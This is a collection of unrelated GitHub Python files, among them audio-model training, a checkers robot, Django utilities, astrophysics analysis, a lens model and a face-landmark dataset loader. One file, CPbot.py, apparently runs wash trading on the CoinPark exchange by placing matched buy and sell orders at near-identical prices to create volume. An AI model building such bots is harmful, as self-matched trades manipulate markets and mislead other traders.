does: \n# ![StratifiedKFold](https://scikit-learn.org/stable/_images/sphx_glr_plot_cv_indices_003.png)\n\n# In[5]:\n\n\nfile_list = []\nlabel_list = []\n\nfor f in os.listdir('/Volumes/Software/rfcx-species-audio-detection/working/'):\n if '.bmp' in f:\n file_list.append(f)\n label = str.split(f, '_')[1]\n label_list.append(label)\n\n\nfrom sklearn.model_selection import StratifiedKFold\n\nskf = StratifiedKFold(n_splits=5, shuffle=True, random_state=rng_seed)\n\ntrain_files = []\nval_files = []\n\nnum_file = 0\nprint\nfor fold_id, (train_index, val_index) in enumerate(skf.split(file_list, label_list)):\n # Picking only first fold to train/val on\n # This means loss of 20% training data\n # To avoid this, you can train 5 different models on 5 folds and average predictions\n if fold_id == 0 and num_file < 500:\n train_files = np.take(file_list, train_index)\n val_files = np.take(file_list, val_index)\n num_file += 1\n\nprint('Training on ' + str(len(train_files)) + ' examples')\nprint('Validating on ' + str(len(val_files)) + ' examples')\n\n\n# Preparing everything for training\n\n# In[6]:\n\n\n#get_ipython().system(u'pip install resnest > /dev/null')\n\n\n# In[7]:\n\n\nimport torch.nn as nn\nfrom resnest.torch import resnest50\n\ntrain_dataset = RainforestDataset(train_files)\nval_dataset = RainforestDataset(val_files)\n\ntrain_loader = torchdata.DataLoader(train_dataset, batch_size=batch_size, sampler=torchdata.RandomSampler(train_dataset))\nval_loader = torchdata.DataLoader(val_dataset, batch_size=batch_size, sampler=torchdata.RandomSampler(val_dataset))\n\n# ResNeSt: Split-Attention Networks\n# https://arxiv.org/abs/2004.08955\n# Significantly outperforms standard Resnet\nmodel = resnest50(pretrained=True)\n\nmodel.fc = nn.Sequential(\n nn.Linear(2048, 1024),\n nn.ReLU(),\n nn.Dropout(p=0.2),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Dropout(p=0.2),\n nn.Linear(1024, num_birds)\n)\n\n# Picked for this notebook; pick new ones after major changes (such as adding train_fp to train data)\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01, weight_decay=0.0001, momentum=0.9)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.4)\n\n# This loss function is not exactly suited for competition metric, which only cares about ranking of predictions\n# Exploring different loss fuctions would be a good idea\npos_weights = torch.ones(num_birds)\npos_weights = pos_weights * num_birds\nloss_function = nn.BCEWithLogitsLoss(pos_weight=pos_weights)\n\nif torch.cuda.is_available():\n model = model.cuda()\n loss_function = loss_function.cuda()\n\n\n# Training model on saved spectrograms\n\n# In[8]:\n\n\nbest_corrects = 0\n\n# Train loop\nprint('Starting training loop')\n\nstart = time.time()\nfor e in range(0, 2):\n # Stats\n train_loss = []\n train_corr = []\n \n # Single epoch - train\n model.train()\n for batch, (data, target) in enumerate(train_loader):\n data = data.float()\n if torch.cuda.is_available():\n data, target = data.cuda(), target.cuda()\n \n optimizer.zero_grad()\n \n output = model(data)\n loss = loss_function(output, target)\n \n loss.backward()\n optimizer.step()\n \n # Stats\n vals, answers = torch.max(output, 1)\n vals, targets = torch.max(target, 1)\n corrects = 0\n for i in range(0, len(answers)):\n if answers[i] == targets[i]:\n corrects = corrects + 1\n train_corr.append(corrects)\n \n train_loss.append(loss.item())\n \n # Stats\n for g in optimizer.param_groups:\n lr = g['lr']\n print('Epoch ' + str(e) + ' training end. LR: ' + str(lr) + ', Loss: ' + str(sum(train_loss) / len(train_loss)) +\n ', Correct answers: ' + str(sum(train_corr)) + '/' + str(train_dataset.__len__()))\n \n # Single epoch - validation\n with torch.no_grad():\n # Stats\n val_loss = []\n val_corr = []\n \n model.eval()\n for batch, (data, target) in enumerate(val_loader):\n data = data.float()\n if torch.cuda.is_available():\n data, target = data.cuda(), target.cuda()\n \n output = model(data)\n loss = loss_function(output, target)\n \n # Stats\n vals, answers = torch.max(output, 1)\n vals, targets = torch.max(target, 1)\n corrects = 0\n for i in range(0, len(answers)):\n if answers[i] == targets[i]:\n corrects = corrects + 1\n val_corr.append(corrects)\n \n val_loss.append(loss.item())\n \n # Stats\n print('Epoch ' + str(e) + ' validation end. LR: ' + str(lr) + ', Loss: ' + str(sum(val_loss) / len(val_loss)) +\n ', Correct answers: ' + str(sum(val_corr)) + '/' + str(val_dataset.__len__()))\n \n # If this epoch is better than previous on validation, save model\n # Validation loss is the more common metric, but in this case our loss is misaligned with competition metric, making accuracy a better metric\n if sum(val_corr) > best_corrects:\n print('Saving new best model at epoch ' + str(e) + ' (' + str(sum(val_corr)) + '/' + str(val_dataset.__len__()) + ')')\n torch.save(model, 'best_model.pt')\n best_corrects = sum(val_corr)\n \n # Call every epoch\n scheduler.step()\n end = time.time()\n print('this epoch takes ' + str(end - start))\n\n# Free memory\ndel model\n\n\n# Function to split and load one test file\n\n# In[9]:\n\n\n# Already defined above; for reference\n\n# fft = 2048\n# hop = 512\n# sr = 48000\n# length = 10 * sr\n\ndef load_test_file(f):\n wav, sr = librosa.load('/kaggle/input/rfcx-species-audio-detection/test/' + f, sr=None)\n\n # Split for enough segments to not miss anything\n segments = len(wav) / length\n segments = int(np.ceil(segments))\n \n mel_array = []\n \n for i in range(0, segments):\n # Last segment going from the end\n if (i + 1) * length > len(wav):\n slice = wav[len(wav) - length:len(wav)]\n else:\n slice = wav[i * length:(i + 1) * length]\n \n # Same mel spectrogram as before\n mel_spec = librosa.feature.melspectrogram(slice, n_fft=fft, hop_length=hop, sr=sr, fmin=fmin, fmax=fmax, power=1.5)\n mel_spec = resize(mel_spec, (224, 400))\n \n mel_spec = mel_spec - np.min(mel_spec)\n mel_spec = mel_spec / np.max(mel_spec)\n \n mel_spec = np.stack((mel_spec, mel_spec, mel_spec))\n\n mel_array.append(mel_spec)\n \n return mel_array\n\n","repo_name":"liangy396/Kaggle_Audio","sub_path":"mini_train.py","file_name":"mini_train.py","file_ext":"py","file_size_in_byte":8939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11917887572","text":"from checkers.game import Game\nfrom checkers.minimax.algorithm import minimax\nimport time\nimport cv2\nimport pyrealsense2 as rs\nimport numpy as np\n\nMINIMAX_DEPTH = 3\n\ndef findAruco(img):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n arucoDict = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_250)\n arucoParam = cv2.aruco.DetectorParameters()\n arucoDetector = cv2.aruco.ArucoDetector(arucoDict, arucoParam)\n \n marker_corners, ids, _ = arucoDetector.detectMarkers(gray)\n \n all_arucos = {}\n \n if ids is not None:\n for i in range (len(ids)):\n x_center = (marker_corners[i][0][0][0] + marker_corners[i][0][1][0] + marker_corners[i][0][2][0] + marker_corners[i][0][3][0])/4\n y_center = (marker_corners[i][0][0][1] + marker_corners[i][0][1][1] + marker_corners[i][0][2][1] + marker_corners[i][0][3][1])/4\n all_arucos[ids[i][0]] = [int(y_center/125), int(x_center/125)] # dictionary in the format id: [row, col] for every aruco marker ID\n \n cv2.aruco.drawDetectedMarkers(img, marker_corners)\n \n return all_arucos\n\n# start running the checkers game from here\ndef main():\n run = False # set state of the game\n \n # initialize camera\n pipeline = rs.pipeline()\n config = rs.config()\n config.enable_stream(rs.stream.color, 1920, 1080, rs.format.bgr8, 30)\n\n color_path = 'V00P00A00C00_rgb.avi'\n colorwriter = cv2.VideoWriter(color_path, cv2.VideoWriter_fourcc(*'XVID'), 30, (1920,1080), 1)\n pipeline.start(config)\n \n \n run = True # set state of the game\n game = Game()\n\n print(f\"Welcome to CheckUR5!\\n\\nHere are the commands you can type and send:\\n\")\n print(\"\\tstart - start the game\\n\\tquit - quit the game\\n\")\n userInput = input(\"Enter a command: \")\n\n if (userInput == 'start'):\n run = True\n elif (userInput == 'quit'):\n run = False\n else: # lol this logic isn't checking for bad commands after the else so it would just default to exit\n print(f\"ERROR:Please enter a valid command!\\n\\nHere are the commands you can type and send:\\n\")\n userInput = input(f\"\\tstart - start the game\\n\\tquit - quit the game\\n\")\n try:\n while run:\n winner = game.get_winner()\n \n if winner != None:\n if winner == \"orange\":\n print(f\"The UR5 Robot won the game!\\n\")\n else:\n print(f\"The Player won the game!\\n\")\n \n # TODO: maybe give option to reset and start the game again here???\n run = False\n # robot's turn\n elif game.turn == \"orange\":\n value, new_board = minimax(game.get_board(), MINIMAX_DEPTH, \"orange\", game)\n \n print(\"UR5 Robot's turn actions: \\n\")\n game.ai_move(new_board) # set robot's move decision and move robot\n # human player's turn\n elif game.turn == \"blue\":\n # TODO: add turn timeout after 20 seconds\n # timeout = 20 # 20 seconds to make a turn\n\n player_input = input(\"Player's turn, press A to end turn or B to get more options: \")\n\n if player_input == \"A\":\n # get next frame\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n if not color_frame:\n continue\n \n #convert images to numpy arrays\n color_image = np.asanyarray(color_frame.get_data())\n \n colorwriter.write(color_image)\n \n # warp & crop board image\n width, height = 1000, 1000\n point1 = np.float32([[561,110], [399, 917], [1485, 928], [1355, 105]])\n point2 = np.float32([[0, 0], [0, height-1], [width-1, height-1], [width-1, 0]])\n matrix = cv2.getPerspectiveTransform(point1, point2)\n output = cv2.warpPerspective(color_image, matrix, (width, height)) \n output = cv2.rotate(output, cv2.ROTATE_180)\n \n # sharpen image\n kernel = np.array([[0, -1, 0],\n [-1, 5,-1],\n [0, -1, 0]])\n output = cv2.filter2D(src=output, ddepth=-1, kernel=kernel)\n \n # find arucos and returns dictionary of aruco IDs and their positions on the board\n all_arucos = findAruco(output)\n \n game.update_board(all_arucos)\n \n # for id in all_arucos:\n # print(all_arucos[id][0])\n \n # print(all_arucos)\n \n # cv2.imshow(\"Image\", color_image)\n # cv2.imshow(\"Output\", output)\n \n # if cv2.waitKey(1) == ord(\"q\"):\n # break\n elif player_input == \"B\":\n print(\"MORE GAME OPTIONS:\")\n player_input = input(f\"\\n\\treset - reset the game\\n\\tquit - quit the game\\n\")\n if player_input == \"reset\":\n pass\n # TODO: add interaction to reset the game\n # lol idk how to incorporate this\n elif player_input == \"quit\":\n print(f\"Thank you for playing! :)\")\n run = False\n\n # indicate the moves/removes human has made\n # TODO: list out the actions the player took\n # print(f\"Player's turn actions: \\n\")\n\n # show output window\n # TODO : live feed while playing checkers game\n # cv2.imshow(\"Output\", output)\n \n # if cv2.waitKey(1) == ord(\"q\"):\n # break\n finally:\n colorwriter.release()\n cv2.destroyAllWindows()\n pipeline.stop()\n\nmain()\n","repo_name":"UR5-Senior-Design/CheckUR5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73715620007","text":"class File:\n def __init__(self, name, location, size, date_of_creation, file_encoding):\n self.name = name\n self.location = location\n self.size = size\n self.date_of_creation = date_of_creation\n self.file_encoding = file_encoding\n def create_file(self):\n print(f\"Creating {self.name} file...\")\n def update_file(self):\n print(f\"Updating {self.name} file...\")\n def delete_file(self):\n print(f\"Deleting {self.name} file...\")\nclass TextFile(File):\n def __init__(self, name, location, size, date_of_creation, file_encoding):\n super().__init__(name, location, size, date_of_creation, file_encoding)\nclass AudioFile(File):\n def __init__(self, name, location, size, date_of_creation, file_encoding, length, bit_rate):\n super().__init__(name, location, size, date_of_creation, file_encoding)\n self.length = length\n self.bit_rate = bit_rate\n def create_file(self):\n print(f\"Creating {self.name} audio file...\")\n def delete_file(self):\n print(\"Audio files cannot be deleted.\")\nclass VideoFile(File):\n def __init__(self, name, location, size, date_of_creation, file_encoding, length, video_quality):\n super().__init__(name, location, size, date_of_creation, file_encoding)\n self.length = length\n self.video_quality = video_quality\n def create_file(self):\n print(f\"Creating {self.name} video file...\")\n def delete_file(self):\n print(\"Video files cannot be deleted.\")\ndef main():\n print(\"File Creation Program\")\n print(\"1. Create Text File\")\n print(\"2. Create Audio File\")\n print(\"3. Create Video File\")\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n name = input(\"Enter name: \")\n location = input(\"Enter location: \")\n size = int(input(\"Enter size: \"))\n date_of_creation = input(\"Enter date of creation: \")\n file_encoding = input(\"Enter file encoding: \")\n text_file = TextFile(name, location, size, date_of_creation, file_encoding)\n text_file.create_file()\n elif choice == 2:\n name = input(\"Enter name: \")\n location = input(\"Enter location: \")\n size = int(input(\"Enter size: \"))\n date_of_creation = input(\"Enter date of creation: \")\n file_encoding = input(\"Enter file encoding: \")\n length = int(input(\"Enter audio length: \"))\n bit_rate = int(input(\"Enter bit rate: \"))\n audio_file = AudioFile(name, location, size, date_of_creation, file_encoding, length, bit_rate)\n audio_file.create_file()\n elif choice == 3:\n name = input(\"Enter name: \")\n location = input(\"Enter location: \")\n size = int(input(\"Enter size: \"))\n date_of_creation = input(\"Enter date of creation: \")\n file_encoding = input(\"Enter file encoding: \")\n length = int(input(\"Enter video length: \"))\n video_quality = input(\"Enter video quality: \")\n video_file = VideoFile(name, location, size, date_of_creation, file_encoding, length, video_quality)\n video_file.create_file()\n else:\n print(\"Invalid choice\")\nif __name__ == \"__main__\":\n main()\n","repo_name":"mansipatil12/Hands_on_MachineLearning","sub_path":"Basics/lab_assignment2.py","file_name":"lab_assignment2.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20556793089","text":"import os\nimport zipfile\n\nimport shutil\nfrom xml.sax.saxutils import unescape\n\nfrom django.conf import settings\n\n\ndef remove_from_zip(zipfname, temp_zip_path, course_shortname, *filenames):\n try:\n tempname = os.path.join(temp_zip_path, course_shortname + '.zip')\n with zipfile.ZipFile(zipfname, 'r') as zipread:\n with zipfile.ZipFile(tempname, 'w') as zipwrite:\n for item in zipread.infolist():\n if item.filename not in filenames:\n data = zipread.read(item.filename)\n zipwrite.writestr(item, data)\n shutil.copyfile(tempname, zipfname)\n finally:\n shutil.rmtree(temp_zip_path)\n\n\ndef unescape_xml(xml_content):\n new_xml = unescape(xml_content,\n {\"'\": \"'\", \""\": '\"', \" \": \" \"})\n new_xml = new_xml.replace(' ', ' ') \\\n .replace('"', '\"') \\\n .replace('&', '&')\n return new_xml\n\n\ndef rewrite_xml_contents(user, course, xml_doc):\n temp_zip_path = os.path.join(settings.COURSE_UPLOAD_DIR,\n 'temp',\n str(user.id))\n module_xml = course.shortname + '/module.xml'\n try:\n os.makedirs(temp_zip_path)\n except OSError:\n pass # leaf dir for user id already exists\n\n course_zip_file = os.path.join(settings.COURSE_UPLOAD_DIR,\n course.filename)\n remove_from_zip(course_zip_file,\n temp_zip_path,\n course.shortname,\n module_xml)\n\n xml_content = xml_doc.toprettyxml(indent='',\n newl='',\n encoding='utf-8').decode('utf-8')\n xml_content = unescape_xml(xml_content)\n\n with zipfile.ZipFile(course_zip_file, 'a') as z:\n z.writestr(module_xml, xml_content)\n","repo_name":"DigitalCampus/django-oppia","sub_path":"oppia/utils/course_file.py","file_name":"course_file.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"19258558629","text":"#!/usr/bin/python\n\n'''\nPlots covering fraction over time as a heatmap\n'''\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\npd.options.mode.chained_assignment = None\n\ndef galaxyProps(location):\n\n fname = location+'/i90/galaxy.props'\n with open(fname) as f:\n galID = f.readline().split()[1]\n expn = f.readline().split()[1]\n redshift = f.readline().split()[1]\n mvir = f.readline().split()[1]\n rvir = float(f.readline().split()[1])\n inc = int(float(f.readline().strip().split()[1]))\n\n return galID,expn,redshift,mvir,rvir,inc\n\n# Cf parameters\nCL = 0.8413\ntol = 13-4\npmin = 0.0\npmax = 1.0\niterations = 1000\n\nrootloc = '/mnt/cluster/abs/cgm/vela2b/'\nrootloc = '/home/jacob/research/velas/vela2b/'\nsubloc = 'vela{0:d}/a{1:.3f}/i{2:d}/{3:s}/'\nfilename = '{0:s}.{1:s}.a{2:.3f}.i90.ALL.sysabs.h5'\n\ngalNums = range(21,30)\n\nions = 'HI MgII CIV OVI'.split()\newcut = 0.1\n\nloD,hiD = 0,1.5\nnumDbins = 15\nDbins = np.linspace(loD,hiD,numDbins+1)\nDbinLabels = ['{0:.1f}'.format(i) for i in Dbins[1:]]\n\nfinalExpn = [0.550]*len(galNums)\n\nfor galNum,finala in zip(galNums,finalExpn):\n\n print(galNum)\n\n expns = np.arange(0.200,finala,0.01)\n expnLabels = ['a{0:d}'.format(int(a*1000)) for a in expns]\n header = [expnLabels,ions]\n header = pd.MultiIndex.from_product(header)\n results = np.zeros((numDbins,len(header)))\n results = pd.DataFrame(results,columns=header,index=DbinLabels)\n\n for a,aLabel in zip(expns,expnLabels):\n\n loc = rootloc+'vela{0:d}/a{1:.3f}/'.format(galNum,a)\n\n try:\n galID,expn,redshift,mvir,rvir,inc = galaxyProps(loc)\n \n for ion in ions:\n\n loc = rootloc+subloc.format(galNum,a,inc,ion)\n sysabs = loc+filename.format(galID,ion,a)\n df = pd.read_hdf(sysabs,'data')\n \n for i in range(numDbins):\n loD = np.round(Dbins[i]*rvir,1)\n hiD = np.round(Dbins[i+1]*rvir,1)\n\n index = (df['D']>=loD) & (df['D']ewcut).sum()\n numLOS = index.sum()\n\n fraction = float(numHits)/float(numLOS)\n results[aLabel,ion].iloc[i] = fraction\n\n except IOError:\n continue\n\n s = 'vela2b-{0:d}_covering.h5'.format(galNum)\n results.to_hdf(s,'data',mode='w')\n \n\n\n\n","repo_name":"jrvliet/analysis","sub_path":"bulkVelas/covering.py","file_name":"covering.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19130509252","text":"import REST.REST_API as CONST\r\nfrom REST.REST_API import REST_API\r\nimport configparser\r\nfrom Logging import Logger\r\nimport math\r\nimport schedule\r\nimport time\r\n\r\n\r\nconf = configparser.ConfigParser()\r\nconf.read(\"conf.ini\")\r\napi = REST_API()\r\n# 写日志\r\nlog = Logger('all.log',level='debug')\r\nkey = conf.get(\"section\", \"key\")\r\nsecret = conf.get(\"section\", \"secret\")\r\n#参数\r\nmount = int(conf.get(\"section\", 'mount'))\r\nsymbol = conf.get(\"section\", 'symbol')\r\norder_sleep = int(conf.get(\"section\", \"order_sleep\"))\r\ntrading_strategy = int(conf.get(\"section\", \"trading_strategy\")) #1为差价2为平价\r\n\r\napi = REST_API()\r\napi.auth(key, secret)#授权\r\n\r\n# 程序停止时间设置\r\ndef sleep(t):\r\n time.sleep(t)\r\n#撤销订单\r\ndef ordercancle(index,order_id):\r\n log.logger.info(str(index) + \"号:订单号\" +str(order_id))\r\n cmd = api.cancel_order_cmd(index,order_id)\r\n success, r = api.multi_sign_cmd(cmd)\r\n if success:\r\n if index == 2:\r\n log.logger.info(\"撤销卖单\")\r\n elif index == 1:\r\n log.logger.info(\"撤销买单\")\r\n log.logger.info(\"撤销缓冲...\")\r\n sleep(5)\r\n else:\r\n log.logger.info(r)\r\n#获取订单状态\r\ndef orderstatus(order_id):\r\n success, r = api.get_order(order_id)\r\n #log.logger.info(r)\r\n if success:\r\n status = int(r['result'][0]['result']['status'])\r\n else:\r\n log.logger.info(r)\r\n return 0\r\n #log.logger.info(status)\r\n if status == 3:\r\n return 3\r\n elif status == 2:\r\n return 2\r\n else:\r\n return 0\r\n#循环判断订单完成\r\ndef orderjust(order_id):\r\n flag=0\r\n while True:\r\n r = orderstatus(order_id)\r\n if r == 3:\r\n return True\r\n elif r == 2:\r\n log.logger.info(\"订单部分已成交...\")\r\n else:\r\n log.logger.info(\"订单正在等待撮合...\")\r\n flag+=1\r\n sleep(1)\r\n if flag == order_sleep:\r\n return False\r\n# 精度控制,直接抹除多余位数,非四舍五入\r\ndef digits(num, digit):\r\n site = pow(10, digit)\r\n tmp = num * site\r\n tmp = math.floor(tmp) / site\r\n return tmp\r\ndef pricedecimal(num):\r\n num = digits(num, 4)\r\n#h获得买一卖一进行价差运算,得到price\r\ndef getprice():\r\n success, ticker = api.get_ticker(symbol)\r\n if success:\r\n buy = float(ticker['result']['buy'])\r\n sell = float(ticker['result']['sell'])\r\n return buy,sell\r\n else:\r\n print(\"获得买卖价失败!\")\r\n log.logger.info(ticker)\r\n return 1,0\r\n#获取USDT余额\r\ndef getusdt():\r\n success, usdt = api.get_balance(1)\r\n if success:\r\n r = usdt['result'][0]['result']['assets_list'][3]['balance']\r\n return r\r\n else:\r\n log.logger.info(usdt)\r\n return 0\r\ndef handler():\r\n buyprice, sellprice = getprice()#获取买一卖一价\r\n if trading_strategy == 2:#平价(有千一价差)\r\n r = (buyprice+sellprice)/2.0\r\n r = digits(r,4)\r\n #print(\"买一\",buyprice,\"卖一\",sellprice,\"平价\",r)\r\n log.logger.info(\"买一\"+str(buyprice)+\"卖一\"+str(sellprice)+\"平价\"+str(r))\r\n buyprice=r\r\n sellprice=r+0.0001\r\n elif trading_strategy ==1:#买一卖一\r\n #print(\"买一\", buyprice, \"卖一\", sellprice)\r\n log.logger.info(\"买一\"+str(buyprice)+\"卖一\"+str(sellprice))\r\n margin = buyprice - sellprice\r\n if margin <= 0:\r\n buymount = digits(mount/buyprice,4)\r\n sellmount = digits(mount/sellprice,4)\r\n cm1 = api.create_order_cmd(1, symbol, CONST.SIDE_BUY, CONST.TYPE_LIMIT_PRICE, buyprice, buymount, 0)\r\n cm2 = api.create_order_cmd(2, symbol, CONST.SIDE_SELL, CONST.TYPE_LIMIT_PRICE, sellprice, sellmount, 0)\r\n success, r = api.multi_sign_cmd([cm1, cm2])\r\n log.logger.info(\"调试信息:\")\r\n log.logger.info(r)\r\n if success:\r\n try:\r\n ordersellid = r['result'][0]['result']\r\n ordersellindex = r['result'][0]['index']\r\n orderbuyid = r['result'][1]['result']\r\n orderbuyindex = r['result'][1]['index']\r\n #调试\r\n #print(\"sell_price\", sellprice, \"sell_mount\", sellmount,\"sell_orderid\",ordersellid)\r\n #log.logger.info(\"sell_price\"+str(sellprice)+\"sell_mount\"+str(sellmount)+\"sell_orderid\"+str(ordersellid))\r\n #print(\"buy_price\", buyprice, \"buy_mount\", buymount,\"buy_orderid\",orderbuyid)\r\n #log.logger.info(\"buy_price\"+str(buyprice) + \"buy_mount\"+str(buymount)+\"buy_orderid\"+str(orderbuyid))\r\n\r\n except KeyError:\r\n pass\r\n try:\r\n #判断订单是否完成\r\n if orderjust(orderbuyid) == False:\r\n print(orderbuyid)\r\n ordercancle(orderbuyindex,orderbuyid)\r\n else:\r\n log.logger.info(\"买单已成交\")\r\n if orderjust(ordersellid) == False:\r\n print(ordersellid)\r\n ordercancle(ordersellindex,ordersellid)\r\n else:\r\n log.logger.info(\"卖单已成交\")\r\n log.logger.info(\"结尾日志:\")\r\n log.logger.info(r)\r\n except UnboundLocalError:\r\n pass\r\n else:\r\n log.logger.info(r)\r\nschedule.every(1).seconds.do(handler)\r\nlog.logger.info(\"使用交易对:\")\r\nlog.logger.info(symbol)\r\nlog.logger.info(\"对冲USDT消耗数量:\")\r\nlog.logger.info(mount)\r\nwhile True:\r\n #log.logger.info(\"USDT余额:\"+getusdt())\r\n schedule.run_pending()\r\n time.sleep(2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Kaneki-x/coinpark","sub_path":"CPbot.py","file_name":"CPbot.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19743291352","text":"import numpy as np\nfrom MagniPy.util import *\nfrom MagniPy.MassModels.ExternalShear import Shear\n\nclass SIE:\n\n def __init__(self):\n \"\"\"\n adopting a standard cosmology, other cosmologies not yet implemented\n :param z1: lens redshift\n :param z2: source redshift\n :param h: little h\n \"\"\"\n self.Shear = Shear()\n\n def def_angle(self, x, y, theta_E, q, phi_G, center_x=0, center_y=0, gamma=2,shear=None,shear_theta=None):\n\n if gamma!=2:\n raise Exception('only isothermal (gamma=2) models allowed')\n return\n\n xloc = x - center_x\n yloc = y - center_y\n\n phi_G *= -1\n phi_G += -0.5*np.pi\n\n shearx,sheary = 0,0\n\n if q==1:\n\n r = np.sqrt(xloc ** 2 + yloc ** 2)\n\n magdef = theta_E\n\n return shearx+magdef * xloc * r ** -1 , sheary+magdef * yloc * r ** -1\n\n else:\n\n\n q2 = q * q\n qfac = np.sqrt(1 - q2)\n\n normFac = q * np.sqrt(2 * (1 + q2) ** -1)\n\n theta_E *= normFac ** -1\n\n xrot, yrot = rotate(xloc, yloc, -phi_G)\n psi = np.sqrt(q**2*xrot**2+yrot**2)\n psis = psi\n\n xdef = theta_E * q * qfac ** -1 * np.arctan(qfac * xrot * psis ** -1)\n ydef = theta_E * q * qfac ** -1 * np.arctanh(qfac * yrot * (psi) ** -1)\n\n xdef,ydef = rotate(xdef,ydef,phi_G)\n\n return xdef,ydef\n\n def kappa(self, x, y, theta_E, q, phi_G, center_x=0, center_y=0, gamma=2):\n\n alpha = 3-gamma\n\n r_ellip_square = ((x-center_x)**2 + (y-center_y)**2*q**-2)\n rmin = 1e-9\n try:\n r_ellip_square[np.where(r_ellip_square r[0] - self.p[0]:\n self.result += self.hypot(self.p, r)\n self.p = r\n\n def hypot(self, p0, p1):\n s0 = p0[0] - p1[0]\n s1 = p0[1] - p1[1]\n return math.hypot(s0, s1)\n\n\nRacingGame()\n","repo_name":"kechol/exercise","sub_path":"atcoder/arc001_4/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33099041","text":"from .node import Node\nfrom shapely.geometry import MultiPoint\nfrom src.geom import to_Nd\n\n\ndef delete_between(node, source, target):\n prd = source.edge_to(node)\n suc = target.edge_to(node)\n source.connect_to(target)\n\n node.remove_edge(suc)\n node.remove_edge(prd)\n source.remove_edge(prd)\n target.remove_edge(suc)\n\n\ndef node_at(root, coords):\n for n in root.__iter__():\n if n.geom == coords:\n return n\n\n\ndef geom_merge(*nodes):\n res = []\n ids = set()\n for n in nodes:\n ids.add(n.id)\n res.append(n.as_point)\n mlp_center = MultiPoint(res).centroid\n node = Node(to_Nd(mlp_center))\n\n for n in nodes:\n for ins in n.predecessors(edges=True):\n if ins.other_end(n).id not in ids:\n ins.other_end(n).connect_to(node)\n n.remove_edge(ins)\n ins.other_end(n).remove_edge(ins)\n del ins\n for ins in n.successors(edges=True):\n if ins.other_end(n).id not in ids:\n node.connect_to(ins.other_end(n))\n n.remove_edge(ins)\n ins.other_end(n).remove_edge(ins)\n del ins\n for n in nodes:\n del n\n return node\n\n\n# def apply_ppg(node):\n\n\n","repo_name":"psavine42/viper-server","sub_path":"src/structs/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19804104080","text":"import os\nimport numpy as np\nimport cv2\n\nfrom blueprint.ml import Dataset, Split\n\n\nclass WFLW(Dataset):\n def __init__(self, root, split=Split.ALL, subset='all'):\n self.root = root\n\n anno_file = None\n if split == Split.TRAIN:\n anno_file = 'face_landmarks_wflw_train.csv'\n elif split == Split.TEST:\n if subset == 'all':\n anno_file = 'face_landmarks_wflw_test.csv'\n else:\n anno_file = f'face_landmarks_wflw_test_{subset}.csv'\n\n self.info_list = []\n with open(os.path.join(self.root, anno_file), 'r') as fd:\n fd.readline() # skip the first line\n for line in fd:\n line = line.strip()\n if len(line) == 0:\n continue\n if line.startswith('#'):\n continue\n im_path, scale, center_w, center_h, * \\\n landmarks = line.split(',')\n\n landmarks = np.reshape(\n np.array([float(v) for v in landmarks], dtype=np.float32), [98, 2])\n cx, cy = np.mean(landmarks, axis=0)\n\n sample_name = os.path.splitext(im_path)[0].replace(\n '/', '.') + ('_%.3f_%.3f' % (cx, cy))\n im_path = os.path.join(self.root, 'WFLW_images', im_path)\n\n assert os.path.exists(im_path) \n\n self.info_list.append({\n 'sample_name': sample_name,\n 'im_path': im_path,\n 'landmarks': landmarks,\n 'box_info': (float(scale), float(center_w), float(center_h))\n })\n\n def __len__(self):\n return len(self.info_list)\n\n def __getitem__(self, index):\n info = self.info_list[index]\n image = cv2.cvtColor(cv2.imread(info['im_path']), cv2.COLOR_BGR2RGB)\n scale, center_w, center_h = info['box_info']\n box_half_size = 100.0 * scale\n\n return {\n 'image': image,\n 'box': np.array([center_h-box_half_size, center_w-box_half_size,\n center_h+box_half_size, center_w+box_half_size],\n dtype=np.float32),\n 'landmarks': info['landmarks']\n }\n\n def sample_name(self, index):\n return self.info_list[index]['sample_name']\n","repo_name":"FacePerceiver/FaRL","sub_path":"farl/datasets/wflw.py","file_name":"wflw.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"53"} +{"seq_id":"79262171","text":"from django.urls import path\n\nfrom bookworm.blog.views import BlogListView, ArticleDetailView, ArticleCreateView, ArticleUpdateView, ArticleDeleteView\n\nurlpatterns = [\n\tpath('', BlogListView.as_view(), name='blog'),\n\tpath('article//', ArticleDetailView.as_view(), name='article'),\n\tpath('create-article/', ArticleCreateView.as_view(), name='create article'),\n\tpath('update-article//', ArticleUpdateView.as_view(), name='update article'),\n\tpath('delete-article/', ArticleDeleteView.as_view(), name='delete article'),\n]\n","repo_name":"milenmihaylov/bookstore-project","sub_path":"bookworm/bookworm/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 